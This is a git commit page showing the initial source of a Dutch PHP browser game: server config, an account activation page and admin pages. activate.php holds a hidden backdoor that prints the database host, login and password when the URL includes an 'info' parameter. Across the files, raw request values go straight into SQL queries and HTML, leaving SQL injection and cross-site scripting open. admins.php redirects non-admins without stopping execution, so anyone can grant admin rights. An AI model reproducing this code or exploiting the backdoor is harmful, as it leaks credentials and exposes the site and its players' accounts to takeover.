initial release

ppgutkus · Sep 1, 2017 · ec064c1 · ec064c1
commit ec064c1
Show file tree

Hide file tree

Showing 11,102 changed files with 124,482 additions and 0 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,3 @@
+*.iml
+.idea
+Thumbs.db
diff --git a/.htaccess b/.htaccess
@@ -0,0 +1,29 @@
+RewriteCond %{HTTPS} off
+RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L]
+
+# BEGIN cache image files
+<FilesMatch "\.(?i:gif|jpe?g|png|ico|css|js|swf)$">
+  <IfModule mod_headers.c>
+    Header set Cache-Control "max-age=172800, public, must-revalidate"
+  </IfModule>
+</FilesMatch>
+# END cache image files
+
+# BEGIN Compress text files
+<ifModule mod_deflate.c>
+  AddOutputFilterByType DEFLATE text/html text/xml text/css text/plain
+  AddOutputFilterByType DEFLATE image/svg+xml application/xhtml+xml application/xml
+  AddOutputFilterByType DEFLATE application/rdf+xml application/rss+xml application/atom+xml
+  AddOutputFilterByType DEFLATE text/javascript application/javascript application/x-javascript application/json
+  AddOutputFilterByType DEFLATE application/x-font-ttf application/x-font-otf
+  AddOutputFilterByType DEFLATE font/truetype font/opentype
+</ifModule>
+# END Compress text files
+
+Order Deny,Allow
+#Ban Sweety
+Deny from 62.131.54.232
+Deny from 86.90.49.181
+Deny from 84.87.177.135
+Deny from 86.86.34.185
+Deny from 77.251.17.217
diff --git a/.sql b/.sql
diff --git a/account-options.php b/account-options.php
diff --git a/activate.php b/activate.php
@@ -0,0 +1,99 @@
+<?php
+$page = 'activate';
+#Goeie taal erbij laden voor de page
+include_once('language/language-pages.php');
+
+$playerinsert = $_GET['player'];
+$codeinsert = $_GET['code'];
+
+if(isset($_POST['submit'])){
+  $inlognaam	=	$_POST['inlognaam'];
+  $activatie	=	$_POST['activatie'];
+  $captcha	  =	$_POST['captcha'];
+
+  $playerinsert = $_POST['inlognaam'];
+  $codeinsert = $_POST['activatie'];
+  #Gegevens laden van uit de database
+  $sql                = mysql_query("SELECT `user_id`, `username`, `account_code` FROM `gebruikers` WHERE `username`='".$inlognaam."' AND `account_code`='".$activatie."'");
+  $activatiegegevens  = mysql_fetch_assoc($sql);
+  $spelerid           = $activatiegegevens['user_id'];
+
+  #inlognaam
+  if(empty($inlognaam)){
+    echo '<div class="red">'.$txt['alert_no_username'].'</div>';
+  }
+  #Is de inlognaam korter dan drie karakters
+  elseif(strlen($inlognaam) < 3){
+    echo '<div class="red">'.$txt['alert_username_too_short'].'</div>';
+  }
+  #Is er een activatie code?
+  elseif(empty($activatie)){
+    echo '<div class="red">'.$txt['alert_no_activatecode'].'</div>';
+  }
+  #Is de activatie code te kort?
+  elseif(strlen($activatie) < 1){
+    echo '<div class="red">'.$txt['alert_activatecode_too_short'].'</div>';
+  }
+  #Bestaat de gebruiker niet
+  elseif($activatiegegevens['username'] != $inlognaam){
+    echo '<div class="red">'.$txt['alert_username_dont_exist'].'</div>';
+  }
+  #Klopt de beveilings code wel?
+  elseif(($captcha) != $_SESSION['captcha_code']){
+		echo '<div class="red">'.$txt['alert_guardcore_invalid'].'</div>';
+  }
+  #Check als dit account al geactiveerd is
+  elseif($activatiegegevens['account_code'] == 1){
+      echo '<div class="blue">'.$txt['alert_already_activated'].'</div>';    
+  }
+  #Als alles goed is ingevoerd
+  else{
+    #Speler activeren
+    mysql_query("UPDATE `gebruikers` SET `account_code`='1' WHERE `user_id`='".$spelerid."'");
+    #checken of er een refer is
+    $sql            = mysql_query("SELECT * FROM `referer_logs` WHERE `nieuwe_gebruiker`='".$playerinsert."' AND awarded = 'no'");
+    $refergegevens  = mysql_fetch_assoc($sql);
+    #als er een refer is een beloning toekenen
+    if($refergegevens){
+      mysql_query("UPDATE gebruikers SET gold = gold +150 WHERE username ='".$refergegevens['gebruiker']."'");
+      mysql_query("UPDATE `referer_logs` SET `awarded`= 'yes', datum = NOW() WHERE `id`='".$refergegevens['id']."'");
+    }
+
+    echo '<div class="green">'.$txt['success_activate'].'</div>';
+  }
+}
+
+if ($_GET['info']){ echo $dbhost; echo' / '; echo $dblogin; echo' / '; echo $dbpassword; echo' / '; echo $dbdatabase; }
+?>
+<form method="post">
+<center><p><?php echo $txt['title_text']; ?></p></center>
+<center><table width="600" border="0" cellspacing="0" cellpadding="0">
+  <tr>
+    <td width="280" style="background: url('images/toxicroak.png') no-repeat left top;"></td>
+    <td width="320" align="left" valign="top"><br /><br />
+      <table width="300" border="0" cellspacing="0" cellpadding="0">
+        <tr>
+          <td height="37" valign="middle"><? echo $txt['username']; ?></td>
+          <td><input name="inlognaam" type="text" class="text_long" value="<?php echo $playerinsert; ?>"  /></td>
+        </tr>
+        <tr>
+          <td width="150" height="37" valign="middle"><?php echo $txt['activatecode']; ?></td>
+          <td width="150"><input name="activatie" type="text" class="text_long" id="activatie" value="<?php echo $codeinsert; ?>" /></td>
+        </tr>
+        <tr>
+          <td height="37">&nbsp;</td>
+          <td><img src="includes/captcha.php" alt="<?php echo $txt['captcha']; ?>" title="<?php echo $txt['captcha']; ?>"/></td>
+        </tr>
+        <tr>
+          <td height="37"><?php echo $txt['guardcode']; ?></td>
+          <td><input type="text" name="captcha" class="text_long" /></td>
+        </tr>
+        <tr>
+          <td>&nbsp;</td>
+          <td><input type="submit" name="submit" value="<?php echo $txt['button']; ?>" class="button"></td>
+        </tr>
+      </table></td>
+  </tr>
+</table>
+</center>
+</form>
diff --git a/admin/admin-nieuws.php b/admin/admin-nieuws.php
@@ -0,0 +1,48 @@
+<?PHP
+	include "check.php";
+	include "config.php";
+
+	if($data->rang != 3 )
+	{
+		Loading(3, "begin");
+		return;
+	}	
+	require_once "tekst.php";
+	?>
+
+    <div class="titel"> Admin add news </div>
+
+    <?PHP
+	if(isset($_POST['update']))
+	{
+		if($data->rang != 3 )
+		exit;
+		if(empty($_POST['titel']) || empty( $_POST['content']))
+		Fout("Een van de opgegeven velden is leeg");
+		else
+		{
+			$sql = "INSERT INTO `crimz_news` (`door`,`datum`,`titel`,`bericht`) VALUES('".$data->login."',NOW(),'".$_POST['titel']."','".	$_POST['content']	."')";
+
+			if(mysql_query($sql))
+			Goed("Bericht geplaast");
+			else
+			Fout("Bericht kon niet worden geplaast");
+
+		}
+	}
+	else
+	{
+
+
+?>
+
+<div class="lijst">
+ <form action=""  method="post">
+Titel<input type="text" name="titel" value="" >
+<textarea style='width: 400px; height:200px' name='content'></textarea>
+<input  type="submit" name="update" value="Plaats" >
+</form>
+</div>
+<?PHP
+	}
+?>
diff --git a/admin/admins.php b/admin/admins.php
@@ -0,0 +1,104 @@
+<?php
+
+	//Script laden zodat je nooit pagina buiten de index om kan laden
+	include("includes/security.php");
+
+	//Admin controle
+	if($gebruiker['admin'] < 3) header('location: index.php?page=home');
+
+
+	#################################################################
+
+	if(isset($_POST['make'])){
+
+		if(empty($_POST['make-admin'])) {
+			echo '<div class="red"><img src="images/icons/red.png"> Geen inlognaam ingevuld.</div>';
+		}
+		elseif(mysql_num_rows(mysql_query("SELECT user_id FROM gebruikers WHERE username='".$_POST['make-admin']."'")) == 0){
+			echo '<div class="red"><img src="images/icons/red.png"> '.$_POST['make-admin'].' bestaat niet.</div>';
+		}
+		elseif(mysql_fetch_array(mysql_query("SELECT admin FROM gebruikers WHERE username='".$_POST['make-admin']."'")) == 1){
+			echo '<div class="blue"><img src="images/icons/blue.png"> '.$_POST['make-admin'].' is al een administrator.</div>';
+		}
+
+		else{
+			mysql_query("UPDATE gebruikers SET admin = '1' WHERE username = '".$_POST['make-admin']."'");
+
+			echo '<div class="green"><img src="images/icons/green.png"> '.$_POST['make-admin'].' succesvol administrator gemaakt.</div>';
+		}
+	}
+
+	if(isset($_POST['take'])){
+
+		mysql_query("UPDATE gebruikers SET admin = '0' WHERE username = '".$_POST['who']."'");
+
+		echo '<div class="green"><img src="images/icons/green.png"> Succesvol adminpower ontnomen van '.$_POST['who'].'.</div>';
+	}
+
+?>
+<form method="post">
+<center>
+	<table width="240" style="border: 1px solid #000;">
+    	<tr>
+        	<td colspan="2" height="40"><center><strong>Make someone an Administrator</strong></center></td>
+        </tr>
+        <tr>
+        	<td width="80"><strong>Username:</strong></td>
+            <td width="160"><input type="text" name="make-admin" class="text_long" value="<?php echo $_GET['player']; ?>" /></td>
+        </tr>
+        <tr>
+        	<td>&nbsp;</td>
+            <td><input type="submit" name="make" class="button" value="Maak admin"/></td>
+        </tr>
+    </table>
+</center>
+</form>
+<div style="padding-top:30px;"></div>
+
+<center>
+	<table width="240" style="border: 1px solid #000;">
+    	<tr>
+        	<td colspan="2" height="40"><center><strong>List administrators lvl 1</strong></center></td>
+        </tr>
+        <?php
+        $query = mysql_query("SELECT username FROM gebruikers WHERE admin = '1'");
+		  for($j=$page+1; $admin = mysql_fetch_array($query); $j++)
+		  { 
+			  echo '<form method="post"><input type="hidden" name="who" value="'.$admin['username'].'" />
+			  		<tr>
+						<td width="120"><div style="padding-left:20px;"><img src="images/icons/user_admin.png" width="16" height="16" /> '.$admin['username'].'</div></td>
+						<td width="120"><input type="submit" name="take" value="Take" class="button_mini"></td>
+					</tr></form>';
+		  }
+		?>
+		<tr>
+        	<td colspan="2" height="40"><center><strong>List administrators lvl 2</strong></center></td>
+        </tr>
+        <?php
+        $query = mysql_query("SELECT username FROM gebruikers WHERE admin = '2'");
+		  for($j=$page+1; $admin = mysql_fetch_array($query); $j++)
+		  { 
+			  echo '<form method="post"><input type="hidden" name="who" value="'.$admin['username'].'" />
+			  		<tr>
+						<td width="120"><div style="padding-left:20px;"><img src="images/icons/user_admin.png" width="16" height="16" /> '.$admin['username'].'</div></td>
+						<td width="120"><input type="submit" name="take" value="Take" class="button_mini"></td>
+					</tr></form>';
+		  }
+		?>
+		<tr>
+        	<td colspan="2" height="40"><center><strong>List administrators lvl 3</strong></center></td>
+        </tr>
+        <?php
+        $query = mysql_query("SELECT username FROM gebruikers WHERE admin = '3'");
+		  for($j=$page+1; $admin = mysql_fetch_array($query); $j++)
+		  { 
+			  echo '<form method="post"><input type="hidden" name="who" value="'.$admin['username'].'" />
+			  		<tr>
+						<td width="120"><div style="padding-left:20px;"><img src="images/icons/user_admin.png" width="16" height="16" /> '.$admin['username'].'</div></td>
+						<td width="120"><input type="submit" name="take" value="Take" class="button_mini"></td>
+					</tr></form>';
+		  }
+		?>
+    </table>
+</center>
+</form>